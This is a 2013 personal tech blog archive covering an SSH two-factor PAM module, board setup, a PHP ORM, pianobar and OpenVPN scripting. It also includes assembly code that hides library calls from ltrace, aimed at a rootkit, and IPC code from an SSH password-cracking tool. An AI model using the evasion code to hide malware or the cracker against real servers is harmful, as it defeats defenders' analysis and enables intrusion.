Monday, December 30, 2013

Simple SSH 2-Factor Authentication Module


I needed a quick 2-factor authentication module for SSH. Instead of going with one of the popular solutions like Duo or Google Authenticator, it seemed like a good excuse to whip up some code. I've written small PAM modules in the past using C, but I've been on a python kick lately so I turned to PAM-Python. The module, we'll call it SSH Two-factor Authentication Module in Python (STAMP to make it catchy), is available over on github

How it Works

STAMP works by generating a one time use personal identification number for each login attempt. The module then looks up the local user's cell phone number, which we'll be storing in the standard Office Phone slot in each pw entry in /etc/passwd. Once it has the user's phone number the module sends the one time use PIN to the user. Instead of storing credentials for a service like Google Voice, I went with one of the first free sites I found, TxtDrop. The source includes a small class for dealing with the TxtDrop SMS form and works with most US carriers that I tried out. Once the correct PIN is entered, the login procedure continues with normal password based authentication.

Setting up the Module

Ensure the following dependencies are already installed on your system.

  • pam-python
  • python-requests

Grab the source and copy to /lib/security

$ git clone
$ cd stampauth
$ sudo cp /lib/security/

Now that the module is in place, we need to configure SSHd to enable Challenge/Response Authentication. In /etc/ssh/sshd_config uncomment the following line.

ChallengeResponseAuthentication yes

We also need to let PAM know the order in which we should process the authentication. I set it up so that the user is first prompted for the one time PIN before being prompted for the password. If you choose to go this route, then in /etc/pam.d/sshd locate the section marked with "@include common-auth" and make it look like the entry below.

auth       requisite
@include common-auth

You can set a user's Office Phone number with the following command.

$ sudo usermod stderr -c ',,555-555-5555,'

Finally, restart sshd and test it out.

$ sudo service ssh restart
$ ssh stderr@localhost
Enter one time PIN: 


An attacker could potentially lock you out of your system by repeatedly connecting to your SSH server and failing the PIN test. This occurs because TxtDrop limits the number of SMSes sent by your IP. Feel free to switch to a different SMS gateway.

Saturday, December 7, 2013

Cubietruck a complete noobie guide


I own a raspberry pi and loved it, but it just wasn't powerful enough. So I googled around and found Cubie, figured it should be more than powerful enough for what I wanted to do. I found out the hard way that the cubie is not as user friendly as the raspberry pi was. My biggest gripe was that there was tons of support however it was not as good as the raspberry pi community is. For instance I was under the impression I could boot from an SD card just like the pi, and while I can what I didn't know is that it has to be a microsd card. Luckily I had an old cell phone that had an 8gig card in it that I could use. The next issue I faced was installing the image onto the sd card and how exactly to do it. In this post I will go over some of the things that I faced with the cubie and how I was able to over come them in hopes that someone else will have good documentation to go off of. I am using the cubietruck and installing lubuntu on an older scandisk 8gig microsd card.

Check List:

  • microsd card reader
  • microsd card (at least 2gig)
  • computer running linux
  • cubietruck
  • a way to supply the cubie with power: For this I'm using a 5v/1amp cell phone dc charger with the supplied usb power cord that came with the cubie
  • hdmi cord
  • tv/monitor with hdmi
  • usb wired or wireless keyboard

  • Software
  • u-boot
  • bootfs
  • rootfs

  • You will also need dd for linux (usually pre-installed)to transfer files.

    Installing the software to boot from microsd

    First thing we'll need to do is find the card then zero it.
    sudo ls /dev/ 
    Your card should show up as sdd or sde (mine happened to be sde) depending on the card and linux distro you're running. You can run ls on /dev/ get the output then plug the microsd card in and run it again to compare. Next we need to zero the card out.
    sudo dd if=/dev/zero of=/dev/sde bs=1024 seek=544 count=128
    Next we're going to make the card bootable with dd.
    dd if=/home/user/downloads/u-boot-sunxi-with-spl-ct-20131102.bin of=/dev/sde bs=1024 seek=8
    Now that the card is bootable we need to create partitions to install the operating system to. To accomplish this we'll be using fdisk on the microsd card.
    sudo fdisk /dev/sde
    We need to create two primary partitions:
  • First partition needs to be 64mb in size
  • Second partition needs to be fill up the rest of the card

    Basic Configuration on first boot

    Username/Password: linaro/linaro Once booted there are a few things you'll want to do. First you'll need to log in, the default user for the OS is linaro the password as you might guess is also linaro. Next thing you'll notice is that there is no wlan0 but only eht0. This is because the modules are not installed. Lets install the modules for Bluetooth and wifi.
    $sudo modprobe bcmdhd
    Now you can configure wpa supplicant to set up wifi. You might run into some issues with wpa_supplicant. You can find help with wpa_supplicant here. Lets reboot now to make sure the configuration stuck. What you'll notice is that once again wlan0 is not there anymore. This is due to the Bluetooth and wifi module not loading on boot, so lets fix this.
    $sudo modprobe bcmdhd
    $sudo nano /etc/modules
    At the end of the /etc/modules you'll need to add bcmdhd so that it will load on boot. Now all you need is to save the file with Ctrl^x and reboot. Now your wireless configuration and module should both load at boot. Now you should have wireless network. At this point you should update and upgrade install packages
    $sudo apt-get update
    $sudo apt-get upgrade


    I've had the cubietruck a short time now, and can say that I do enjoy it and it's power over the pi; however the community could be better as far as development is concerned. I got the cubietruck to make xbmc 720p and 1080p playback smoother, without having to overclock. I haven't quite configured everything I want at the moment so I can't speak on whether the purchase I made for what I wanted the cubietruck to do was worth it. So far it's been a learning curve and I look forward to finding out more I can do with it. For now I have a starting point.


    Main Cubieboard Site
    Tools and OS's
  • Monday, November 18, 2013

    Binaries and Process Tracing

    A little bit about Linux Programs

    The Linux ABI (Application Binary Interface) is used to bind an executable to its imported functions at runtime through several functions provided by the libc sysdeps and the linux linker (ld). For example, when a programmer writes code that contains a call to “printf”, the ABI is responsible for extracting a pointer (in the form of a memory address) from, then writing it into the executable's import table so that it can be called from the executable more practically. The Program Interpreter is a component that can be specified to the ABI for customized executable formats. All dynamically-linked linux applications have what is called an INTERP header (or .interp), you can see this using the command line utility readelf, like so:

    user@host $ grep interpreter <(readelf -a $(which ls))
          [Requesting program interpreter: /lib64/]

    Because I am using a 64-bit system for this demonstration, all of my dynamically linked binaries in my testing environment specify /lib64/, on a 32-bit system, executables will specify a 32-bit counterpart.

    A little about process tracing

    Process tracing in a linux environment can be performed using several different debugging tools-- namely strace, ltrace, ftrace, and interactive debuggers (such as gdb). While strace is an excellent tool for monitoring I/O and certain system calls, it falls short around shared object monitoring capability. That is why ltrace and ftrace were born: they are able to show the actual function calls as they occur from a process to shared objects (*.so files) imported by the executable. This allows administrators and programmers trying to debug issues with an application to determine where in its calls to shared objects things begin to go wrong. Process tracing and debuggers can also be helpful for malware analysis and detection. As such, attackers frequently target these utilities to find evasion methodology amongst other bugs (debugger exploits, anyone?)

    Self-linking code

    When I wrote the dynamic engine for shellcodecs, I implemented my own version of program interpretation. Why? Because there is no guarantee that a given executable will have required functions in its import table for shellcode to run properly. So, I wrote a piece of assembly code capable of parsing an ELF64 shared object to isolate pointers to the functions I wanted to call, similar to dlsym() from libdl. Recently I was entertaining the idea of writing an all-assembly rootkit, so I checked into how calls made by the shellcodecs engine were handled by different tracing methods. I put together a couple of programs to see how things got handled and what information actually got revealed by tracing the processes. I got some pretty interesting results.

    Test programs and results

    My test programs were relatively simple. Here is a normal set of C code that prints “ohai” and then calls exit(2), and its correlating ltrace output:

    #include <stdio.h>
    #include <dlfcn.h>
    #include <stdlib.h>
    int main(void) {

    And its ltrace output:

    user@host $ ltrace ./ltrace-test
    __libc_start_main(0x400544, 1, 0x7fff70b45d88, 0x400570, 0x400600 
    printf("ohai")                                                                               = 4
    +++ exited (status 2) +++

    Notice the tracer caught the call to printf as well as the call to exit. It shows both exit(2) as well as "exited (status 2)". This is an important distinction for our next test:

    #include <stdio.h>
    #include <dlfcn.h>
    #include <stdlib.h>
    // Compile: gcc ltraced.c -o ltraced -ldl
    int main(void)
        void *libc;
        int (*putstr)(char *);
        int (*exitp)(int);
        libc = dlopen("/lib/i386-linux-gnu/i686/cmov/",RTLD_LAZY);
        *(void **)&putstr = dlsym(libc,"puts");
        *(void **)&exitp  = dlsym(libc,"exit");

    And its ltrace results:

    user@host $ ltrace ./ltraced
    __libc_start_main(0x400594, 1, 0x7fff36ae94b8, 0x400610, 0x4006a0 
    dlopen("/lib/i386-linux-gnu/i686/cmov/li"..., ) = NULL
    dlsym(NULL,"puts")                              = 0x7f400a7e0ce0
    dlsym(NULL,"exit")                              = 0x7f400a7ab970
    +++ exited (status 2) +++

    Notice this time it didn't actually catch the call to exit or puts itself -- it only catches the calls to dlsym and dlopen -- but it doesnt catch the calls to puts() or exit() themselves. Reason being, puts() and exit() never appear in the binary's import table, as you can see with the following:

    user@host $ objdump -R ./ltraced
    ./ltraced:     file format elf64-x86-64
    OFFSET           TYPE              VALUE 
    0000000000600fe0 R_X86_64_GLOB_DAT  __gmon_start__
    0000000000601000 R_X86_64_JUMP_SLOT  __libc_start_main
    0000000000601008 R_X86_64_JUMP_SLOT  dlopen
    0000000000601010 R_X86_64_JUMP_SLOT  dlsym

    Implications and further testing

    Since I realized ltrace was only capable of tracing functions in the executable's import table, I wondered if its possible to completely evade ltrace for called functions with an assembly application. The results were phenomenal.

    user@host $ ltrace ./full_import_test 
    __libc_start_main(0x400554, 1, 0x7fff92666938, 0x400690, 0x400720Successfully called puts without import
    +++ exited (status 2) +++

    I was able to get these results with the following assembly program:

    .global main
    .section .data
    .section .bss
    # gcc full_import_test.s -ldl -Wl,-z,relro,-z,now -o full_import_test
        .align 8 
        .align 8
    .section .text
      xor %rdi, %rdi
      mov $0x400130, %rbx
      mov (%rbx), %rcx
      add 0x10(%rbx), %rcx
      mov 0x20(%rcx, %rdi, 2), %rbx     # grab pointer to dlclose()
      dec %rbx
      cmpl $0x464c457f, (%rbx)          # grab base of libdl
    jne find_base
      mov $libdl_base, %rdi
      mov %rbx, (%rdi)
      xor %rdi, %rdi
      push $0x25764b07       # Function hash for dlopen()
      pop %rbp              
      mov $libc, %rdi        #
      push $0x01             
      pop %rsi               # RTLD_LAZY
      call invoke_function   # (%rax) = dlopen('',RTLD_LAZY);
      mov (%rax), %rcx
      mov $libc_base, %rax
      mov %rcx, (%rax)
    jmp _world
    #  Takes a function hash in %rbp and base pointer in %rbx
    #  >Parses the dynamic section headers of the ELF64 image
    #  >Uses ROP to invoke the function on the way back to the
    #  -normal return location
    #  Returns results of function to invoke.
      push %rbp
      push %rbp
      push %rdx
      xor %rdx, %rdx
      push %rdi
      push %rax
      push %rbx      
      push %rsi
      push %rbp
      pop %rdi
        push %rbx
        pop %rbp
       push $0x4c
       pop %rax
       add (%rbx, %rax, 4), %rbx
        add $0x10, %rbx
        cmpb $0x5, (%rbx)
      jne check_dynamic_type
        mov 0x8(%rbx), %rax       # %rax is now location of dynamic string table
        mov 0x18(%rbx), %rbx      # %rbx is now a pointer to the symbol table.
        add $0x18, %rbx
        push %rdx
        pop %rsi
        xorw (%rbx), %si
        add %rax, %rsi
          push %rax
          push %rdx
            push %rdx
            pop %rax
              rol $0xc, %edx
              add %eax, %edx
              test %al, %al
              jnz calc_hash_loop
            push %rdx
            pop %rsi
          pop %rdx 
          pop %rax
      cmp %esi, %edi
      jne check_next_hash
        add 0x8(%rbx,%rdx,4), %rbp
        mov %rbp, 0x30(%rsp)
        pop %rsi
        pop %rbx
        pop %rax
        pop %rdi
        pop %rdx
        pop %rbp
    # push hashes_array_index
    # call fast_invoke
      push %rbp
      push %rbx
      push %rcx
      mov 0x20(%rsp), %ecx
      mov $libc_base, %rax
      mov (%rax), %rbx
      mov $hashes, %rax
      mov (%rax, %rcx, 4), %ebp
      # Registers required for link to work:
      # rbp - function hash
      # rbx - base pointer to lib
      call invoke_function
      mov 0x18(%rsp), %rcx # grab retptr
      mov %rcx, 0x20(%rsp) # kill the function argument
      pop %rcx
      pop %rbx
      pop %rbp
      add $0x8, %rsp
    # freed developer registers: 
    # rax rbp rbx rcx r11 r12 r13 r14 r15
    # a libc call:
    # function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)
      mov $hiddenmsg, %rdi  # arg1
      push $0x1             # function array index in hashes label for puts()
      call fast_invoke      # puts("Successfully called puts without import")
      push $0x02            #
      pop %rdi              # arg1
      push $0x00            # array index in hashes label for exit()
      call fast_invoke      # exit(2);
      ret                   # Exit normally from libc, exit(0)
      #  after execution, echo $? shows 2 and not 0 ;)
        call dlclose
        .asciz ""
        .long 0x696c4780, 0x74773750
        .asciz "Successfully called puts without import"

    And its import table does not contain dlopen(), puts(), or exit():

    user@host $ objdump -R full_import_test
    full_import_test:     file format elf64-x86-64
    OFFSET           TYPE              VALUE 
    0000000000600ff8 R_X86_64_GLOB_DAT  __gmon_start__
    0000000000600fe8 R_X86_64_JUMP_SLOT  __libc_start_main
    0000000000600ff0 R_X86_64_JUMP_SLOT  dlclose

    In this example, we call dlopen() on libc, then use the shellcodecs implementation of dlsym() to call functions. The tricky bit was getting dlopen() to work without showing up in the ltrace call. For this, I ended up putting a "call dlclose" at the end of the application in the force_import label (though it is never actually called or used). By compiling with full relro, I was able to use the pointer to dlclose from the GOT as a way to pivot back to the base of libdl, then re-parse its export table to traverse back to dlopen(). As a result, none of the shared objects opened by dlopen are noticed by ltrace or ftrace. Depending on your runtime environment and your compiler, the offset may be subject to change. The following line is responsible for extracting the dlclose pointer:

      mov 0x20(%rcx, %rdi, 2), %rbx     # grab pointer to dlclose()

    If for some reason this code isn't working on your system, you can probably achieve your desired result by modifying the offset from 0x20 to either 0x18 or 0x28. This is a static offset assigned during compile time. We could also iterate over the string table to determine if we were grabbing the right pointer (e.g. make sure we are getting the pointer to dlclose), but that was not the purpose of these tests. So when it comes to binaries like this, strace (for now) is the only non-interactive option for tracing available, and it won't show you some of those shared-object calls that might be vital to your research.

    Saturday, November 9, 2013

    Development notes from Beleth: Multi-threaded SSH Password Auditor


    Beleth is a fast multi-threaded SSH password auditing tool. For a quick introduction to the tool and how to use it, head over to Blackhat Library.

    Get the source

    Beleth is available on github and will continue to be updated with new features. If you'd like in on the development, submit a pull request.

    $ git clone
    $ cd beleth
    $ make

    Multi-threaded design

    There are a couple of different options available for developers when coming up with multi-threaded design on Linux based systems using C. Two of the most popular are fork() and pthread_create(). Fork() differs from pthread_create() in that address space is not shared between the parent and child threads. Instead, a complete copy of the parent's address, code, and stack spaces are created for the child process. In order to keep dependencies to a minimum, I decided to go with a standard fork design.

    pid = fork();
    if (pid < 0) {
        fprintf(stderr, "[!] Couldn't fork!\n");
    } else if (pid == 0)  { /* Child thread */
        if (ptr != NULL)
    } else {               /* Parent thread */

    This is great, but we need a way to control the child processes that are running through the password list.

    Inter-process Communication (IPC)

    Again, there are many options for developers when it comes to IPC as well. Below is a list of only some of the available options.

    • Shared Memory
    • FIFOs
    • Half-Duplex Pipes
    • Full-Duplex Pipes
    • Sockets

    We are using fork() so memory sharing is not an immediate option, unless we feel like mmap()ing a shared memory space for communication, but that can get messy. FIFOs and pipes would work for distributing the wordlist among threads, but in order to keep options open Beleth uses Unix Domain Sockets for all IPC. By designing IPC with sockets, it would be trivial to turn Beleth into a distributed cracking platform.

    The task handling process binds to a socket file

    int listen_sock(int backlog) {
     struct sockaddr_un addr;
     int fd,optval=1;
     if ((fd = socket(AF_UNIX, SOCK_STREAM, 0)) == -1) {
      if (verbose >= VERBOSE_DEBUG)
       fprintf(stderr, "[!] Error setting up UNIX socket\n");
      return -1;
     fcntl(fd, F_SETFL, O_NONBLOCK); /* Set socket to non blocking */
     setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(int));
     addr.sun_family = AF_UNIX;
     strncpy(addr.sun_path, sock_file, sizeof(addr.sun_path)-1);
     if (bind(fd, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
      if (verbose >= VERBOSE_DEBUG)
       fprintf(stderr, "[!] Error binding to UNIX socket\n");
      return -1;
     if (listen(fd, backlog) == -1) {
      if (verbose >= VERBOSE_DEBUG)
       fprintf(stderr, "[!] Error listening to UNIX socket\n");
      return -1;
     return fd;

    Each cracking thread establishes a connection to the socket file in order to request the next password in the list, as well as tell the task handler when a correct password is found.

    int connect_sock(void) {
     int fd;
     struct sockaddr_un addr;
     if ((fd = socket(AF_UNIX, SOCK_STREAM, 0)) == -1) {
      if (verbose >= VERBOSE_DEBUG)
       fprintf(stderr, "[!] Error creating UNIX socket\n");
      return -1;
        addr.sun_family = AF_UNIX;
        strncpy(addr.sun_path, sock_file, sizeof(addr.sun_path)-1);
        if (connect(fd, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
      if (verbose >= VERBOSE_DEBUG)
       fprintf(stderr, "[!] Error connecting to UNIX socket\n");
      return -1;
     return fd;

    The protocol is simple and based on the following definitions located in beleth.h.

    /* IPC Protocol Header Information */
    #define REQ_PW     0x01 /* Request new password to try */
    #define FND_PW     0x02 /* Found password */
    #define NO_PW    0x03 /* No PWs left... cleanup */

    To-do list

    • Add option for user name list
    • Add option for host list
    • Add simple port scanner and feed new IPs to the task handler
    • Add distributed cracking support

    Wednesday, November 6, 2013

    Local testing for executable overhead

    The other day a friend of mine and I were discussing different types of overhead involved with different programming languages, and I used some simple comparisons to explain that compiled languages have lower overhead than interpreted languages. While it does not directly correlate to ram or processor usage (this can vary on a developer's code), it can give you a general idea of the overall efficiency of any specific language's implementation. We'll be comparing the disk usage and running time of a simple program, exit(0), written in a variety of languages.


    This is a very basic implementation of exit() using a linux system call.

    .section .data
    .section .text
    .globl _start
        xor %rdi, %rdi
        push $0x3c
        popq %rax

    I saved the file as exit.s and assembled/linked it with the following commands:

    $ as exit.s -o exit.o
    $ ld exit.o -o exit


    This is a very quick version of exit.c:

    #include <stdio.h>
    #include <stdlib.h>
    int main (int *argc, char** argv) {

    I compiled this using the following:

    $ gcc exit.c -o exit-c

    Perl is only 2 lines in length:


    I compiled this using par packer (pp):

    $ pp -o exit-pl

    Simple comparisons

    Disk usage reveals:

    $ du -sh exit exit-c exit-pl
    4.0K exit
    12K exit-c
    2.4M exit-pl

    That test includes slack space in its results. Lets find out what the actual byte counts of these files are, shall we?

    $ wc -c exit exit-c exit-pl
        664 exit
       8326 exit-c
    2474525 exit-pl
    2483515 total

    A timing test will show us:

    $ time ./exit
    real 0m0.001s
    user 0m0.000s
    sys  0m0.000s
    $ time ./exit-c
    real 0m0.002s
    user 0m0.000s
    sys  0m0.000s
    $ time ./exit-pl
    real 0m0.187s
    user 0m0.100s
    sys  0m0.020s


    While the perl example is packed using par packer it might not be a fair comparison for a script. We can time that, along with ruby, python, and php while being interpreted by their interpreters:

    $ time perl -e 'exit(0);'
    real 0m0.005s
    user 0m0.000s
    sys 0m0.004s
    $ time ruby -e 'exit'
    real 0m0.008s
    user 0m0.004s
    sys 0m0.004s
    $ time python -c 'exit'
    real 0m0.024s
    user 0m0.016s
    sys 0m0.008s
    $ time php -r 'exit(0);'
    real 0m0.017s
    user 0m0.008s
    sys 0m0.008s

    These timing tests can be used as a base indicator for the general performance of a given language, with assembly in the lead and C not far behind, its trivial to see that truly compiled or assembled languages are in fact faster than interpreters. These aren't perfectly fair comparisons because of several reasons:

    • Unused compiler/interpreter functionality overhead is included regardless of whether or not we use it in our code
    • Other processes running on the test system may cause things like timing to be unreliable (real cycle counting is much more reliable)
    • Actual CPU/Ram usage was never measured

    Regardless of the fact that it isn't perfect, it should give you some idea of the difference in overhead/performance between the given interpreters on the test system, and certainly shows that in general, compiled/assembled languages run more quickly than interpreted languages. Of course, the performance of any application is partly to its programming; so while this may give you an idea of the language performance, it won't tell you how well any particular application written in a given programming language is going to run.

    Saturday, November 2, 2013

    PHP Database Programming: Introducing 'ormclass'

    To begin with, I have a few problems with the traditional web stack. Suppose I wanted to write a feature-rich, user friendly web application -- this requires that I know at least five programming languages:

    It doesn't seem right that we need five languages for a singular application, but that aside, the fact that SQL injection is still in the top ten reasons that anything is compromised is pathetic. We are in the year 2013, SQL injection shouldn't much exist anymore. SQL programming can also be a bit cumbersome, for multiple reasons. Enter the ORM. ORM's are designed for two purposes: making SQL data more easily accessible for a programmer from a chosen programming language, in addition to improving overall application security. The problem I have with most ORM's is simple: I still find myself having to write some form of sql-like statements -- even if it isn't traditional SQL itself. For example, in PHP's doctrine ORM, if I wanted to select an article by id 1, the syntax would look something like:

       $article = Doctrine_Query::Create()->select('*')->from('article')->where('id=?')->execute($id)->fetchOne();

    The syntax may have changed since I last used Doctrine, but you can see there is still a lot of SQL-like code going on (even if its not direct SQL itself). In this case I have to ask, why didn't we just use the mysql PDO library? At this point, we've added a lot of extra bloat to the application in the form of doctrine ORM; yet we still find ourselves writing SQL (or something similar). For all of that code and RAM consumption, that's not much of an improvement for a developer who just wants to hack out a quick application.

    So, I've made my own quick and dirty ORM (available at github). It automatically handles sanitizing for the developer, as well as automatically handling object mapping. Of course, this isn't the best ORM in the world (and I will never make that claim), but it certainly helps for getting some code out quickly and effectively. Its also very tiny. Many improvements can be made to its design, and I will continue to develop this off-and-on as needed for my own applications. The purpose is to effectively eliminate the need to write SQL during (simple) application development.

    The ormclass needs a configuration file to be included before it. The configuration is expected to look like:

        $dbhost   = 'localhost';  //Database server hostname
        $database = '';           //Database name
        $dbuser   = '';           //Database username
        $dbpass   = '';           //Database password
        $dbl      = @mysql_connect($dbhost,$dbuser,$dbpass);
        @mysql_select_db($database,$dbl) or die("I'm not configured properly!");

    Obviously, you'll have to fill those values in for yourself. I wanted an ORM that would let me do something like the following:

        $article  = new article($_GET['id']);
        # or 
        $article  = new article($_GET['title']);
        # or
        $articles = new article($array_of_ids);
        # or 
        $articles = new article($array_of_titles);
        # or 
        $articles = new article($nested_mixed_array_of_titles_and_ids);    

    I also wanted to be able to simply assign properties to the object and save and delete it, or even create new objects. This would also need the capacity for searches, both exact and wildcard. This would (mostly) eliminate the need for writing actual SQL in my application, but also handle some of the tedium of sanitizing for me. Again, I'm aware that this can certainly be done better and if you'd like to contribute to the project, submit a pull request to github. This is a quick and dirty implementation of such an ORM, that allows the programmer some leeway to write logical code in stead of tedious code. There are definitely some places that need work. I've hacked out a version that uses the traditional MySQL library, and I'm working on a version that uses the MySQL PDO library.

    The methods and features included in the library include a few subsets of SQL query tedium removal. The following methods are inherited by all classes extending the ORM's class:

    • __construct($arg = null)
    • search($property,$string,$limit = 10, $offset = 0)
    • search_exact($property,$value, $limit = 10, $offset = 0)
    • unsafe_attr($field,$value)
    • fetchAll()
    • fetchRecent($limit = 10)
    • delete()
    • save()

    The constructor will automatically check to determine if a method called construct() exists in its child class. If so, it will invoke the function after it has preloaded all of the relevant data into the object. This is how relations can be maintained. Its a bit hackier than most ORM's (there's no configuration file in which you simply state the relations), but it gets the job done and allows the programmer to have control over whether or not relations are followed and child objects are created by default. The ORM requires that every table have an 'id' column. The 'name' column is optional. Here is an example relation:

        class article extends ormclass {
            function construct() {
                $this->author = new author($this->author_id);
    • In this example, you could later:
         $article = new article($id);
         echo $article->author->name; # or other author property.

    When you want to create a new record, you can simply pass '0' as the ID for the object, and it will automatically have an ID on instantiation:

        $article = new article(0);

    Alternatively, its possible to just call save after a null instantiation (you'd do this if you don't need it to have an ID for relation purposes before the object has attributes):

        $article = new article();

    Similarly to the constructor hook for construct(), there is also a hook for creation of a new record. If you wanted to do something when a new object is inserted into the database, you could add a function called creation() to the class, and it would be called any time a new record is created in the database.

    The difference between unsafe_attr() and save() is relatively simple. If there is HTML allowed in a field, for example $article->body, then you'd want to use the unsafe_attr() function to save that particular field (save() will autosanitize against XSS). When using unsafe_attr(), because this uses the normal SQL library (and not PDO), you will need to make sure that your html contains exclusively single quotes or exclusively double quotes, it doesn't particularly matter which. The function does do checks to ensure you aren't using both to prevent sql injection, and returns false if both are in use. This bug is the primary reason I'm developing a PDO version separately (besides standards, we cant forget those). This ORM also has a performance/feature trade off. Because I wanted it to be able to handle nested arrays, the collection function runs an arbitrarily large amount of SQL queries. I can provide a version that doesn't do this (but will also be unable to handle nested arrays) on request, since I'm sure people will not want the performance hit; however because I am working on a PDO version, I'd rather make that a loader option in that rendition for how collections are handled. This also currently only auto-sanitizes strings and integers; better sanitizing will come in the PDO version (hence my describing this as "Quick and Dirty").

    This ORM does not have any scaffolding. This means that you will have to create the database and the associated tables yourself before this ORM can access the data. It does not auto-generate tables or class files. If you have an existing database and you'd like to auto-generate the class files, something like the following line of bash should suffice:

    mysql dbname -e 'show tables'|grep -v dbname|awk '{print "<?php\nclass "$0" extends ormclass {\n\n}\n?>"}' > objects.php

    In closing, the point of this was simply to prove that SQL statements can actually be eliminated from the high-level code entirely; and to provide some easily accessible API. The PDO version should be able to handle a few more complex tasks, like table scans and complex joins to create meta-objects from multiple tables. I also plan to extend the compatibility to include PostgreSQL and perhaps even port this to additional programming languages. At any rate, please enjoy your newfound ability to kick back and lazily write database powered applications. Happy hacking.

    Monday, October 21, 2013



    In this post I'm going to go over Pianobar. We'll grab the latest source, compile it, set it up, and run it. Pianobar is a awesome opensource console based client for Pandora Radio.

    Step One:

    First we'll need to install git so we can grab the latest source from github. We're going to grab the source from git so we have the latest code, otherwise we could easily install it from the repositories. So jumping to your terminal you'll just need to
    $ sudo apt-get install git

    Step Two:

    We need to get the latest source of pianobar. So in the terminal again type the following
    $ git clone

    Step Three:

    We need to install the dependencies for pianobar to work correctly. Again the your terminal type the following:
    sudo apt-get install libao-dev libmad0-dev libfaad-dev libgnutls-dev libjson0-dev libgcrypt11-dev

    Step Four:

    Now all we need to do is compile and install the git source we got earlier. So in the same directory that you were in when you used git to get pianobar just `cd` to the pianobar directory and use:
    $ cd pianobar
    $ make
    $ sudo make install

    Step Five:

    At this point pianobar should be installed assuming we didn't get any errors along the way. So the next step is to add information to the config file in your home directory. Pianobar should have a directory within the .config directory, if not create it.
    cat ~/.config/pianobar/config
    We'll need to add some information to the config file in order to make pianobar work correctly. If there is no config file in the pianobar directory create a blank text file named 'config'.
    password = pandora account password here
    Adding your username and password are optional, but it saves you from having to type in your username and password every time.

    Step Six:

    Now to run the beauty that is pianobar for the first time. You can run pianobar by just typing pianobar and hitting enter into your terminal.

    Optional steps:

    So now that we have pianobar functional we can work on other things. For instance getting our plaintext password to be encrypted, keybinding, etc.

    Password Encryption:


    If you're using a multimedia keyboard, you can add keybinds for pianobar. For my setup I have a microsoft wireless comfort keyboard 4000, and I'm running crunchbang with openbox. Openbox keybinds are located in the rc.xml config file. What we'll also need is to grab files. Make sure you're in your .config/pianobar directory before you use the following command:
    git clone
    First we need to know exactly what the keys do in order to map them to a command. So we'll use xev tool for that. So in  your terminal type in xev and hit enter, next hit one of the multimedia keys on your keyboard. You'll see output like this:
    KeyPress event, serial 46, synthetic NO, window 0x4e00001,
    root 0x370, subw 0x0, time 2488373614, (943,113), root:(1395,1057),
    state 0x10, keycode 164 (keysym 0x1008ff30,
    XF86Favorites), same_screen YES,
    XLookupString gives 0 bytes:
    XmbLookupString gives 0 bytes:
    XFilterEvent returns: False
    KeyRelease event, serial 46, synthetic NO, window 0x4e00001,
    root 0x370, subw 0x0, time 2488373806, (943,113), root:(1395,1057),
    state 0x10, keycode 164 (keysym 0x1008ff30, XF86Favorites), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False
    XF86Favorites is what we'll need to configure our keybind. So open up your rc.xml file and navigate to where the keybind area is and add the xml portion to execute a command from the The button I'm setting up is the "star" button on my keyboard which I'm going to use to tell pianobar that I like that song. In the rc.xml file I'm going to add:
    <keybind key="XF86Favorites"> 
        <action name="Execute"> 
            <command>/home/xplicit/.config/pianobar/ +</command>

    Now all we need to do is save the rc.xml file and reconfigure openbox then test it.
    └──╼ pianobar
    Welcome to pianobar (2012.05.06)! Press ? for a list of commands.
    (i) Control fifo at /home/username/.config/pianobar/ctl opened
    (i) Login... Ok.
    (i) Get stations... Ok.
      0) q   2Pac (Tupac) Radio
      1) q   A Day To Remember Radio
      2) q   Eazy-E Radio
      3) q   Eminem Radio
      4) q   Mac Miller Radio
      5) q   New Found Glory Radio
      6)  Q  QuickMix
      7) q   Tate Stevens Radio
      8) q   Travie McCoy Radio
    [?] Select station: q
      6)  Q  QuickMix
    [?] Select station: 6
    |>  Station QuickMix
    (i) Receiving new playlist... Ok.
    |>  The Last Thing I Do by Tate Stevens on Tate Stevens @ Tate Stevens Radio
    |>  I'd Rather Fuck You by Eazy-E on Eternal E (Explicit) @ Eazy-E Radio
    |>  Mr. Highway's Thinking About The End by A Day To Remember on Homesick @ A Day To Remember Radio
    You can see all my keybinds for pianobar here.

    Links and Sources:

    Pianobar Project
    Bruce Connor fifo script

    Saturday, October 12, 2013

    Dynamic Subdomains with OpenVPN and PyTinyDNS


    As I have covered in a previous post about PyTinyDNS there are multiple uses for a dynamic DNS service like this. One of my side projects is hosting a private Virtual Private Network (VPN). Along with hosting my own TLDs, I also wanted to have a custom solution for dynamically assigning a subdomain to each individual client that connects to the network. This way if the user happens to get assigned a different IP, others on the net will be able to easily connect to their services without any issues.


    PyTinyDNS uses redis to make dynamic additions of domains and subdomains possible without adding extra config files or restarting the daemon. PyTinyDNS also comes with an import script that allows you to add either a text file full of domains or individual domains via the command line arguments. We'll strip the functionality from the import tool and use it to assign dynamic subdomains through OpenVPN's scripting features.


    OpenVPN comes with built-in options to add custom scripts that are triggered by multiple events. The following are example events that you can configure in order to take advantage of endless custom solutions.

    • --up (Executed after TCP/UDP socket bind and TUN/TAP open.)
    • --tls-verify (Executed when we have a still untrusted remote peer.)
    • --ipchange (Executed after connection authentication, or remote IP address change.)
    • --client-connect (Executed in --mode server mode immediately after client authentication.)
    • --route-up (Executed after connection authentication, either immediately after, or some number of seconds after as defined by the --route-delay option.)
    • --client-disconnect (Executed in --mode server mode on client instance shutdown.)
    • --down (Executed after TCP/UDP and TUN/TAP close.)
    • --learn-address (Executed in --mode server mode whenever an IPv4 address/route or MAC address is added to OpenVPN's internal routing table.)
    • --auth-user-pass-verify (Executed in --mode server mode on new client connections, when the client is still untrusted.)

    The only event that we need to watch in order to add custom A PTRs to PyTinyDNS is --client-connect. Go ahead and create a directory to store the custom script in.

    $ mkdir /etc/openvpn/scripts

    Now at the bottom of your OpenVPN server.conf, add the following lines.

    script-security 2
    client-connect '/usr/bin/python /etc/openvpn/scripts/'

    The Script

    The following is a quick Python script used to add the correct subdomain based on the user's common name used in the client's certificate.

    import redis
    import os
    def insert_record(domain, ip, redis_server):
     r_server = redis.Redis(redis_server)
      r_server.hset('', domain, ip) 
    def main():
     redis_server = 'localhost'
      insert_record(os.environ['common_name'] + "",os.environ['ifconfig_pool_remote_ip'],redis_server) 
     return 0
    if __name__ == '__main__':

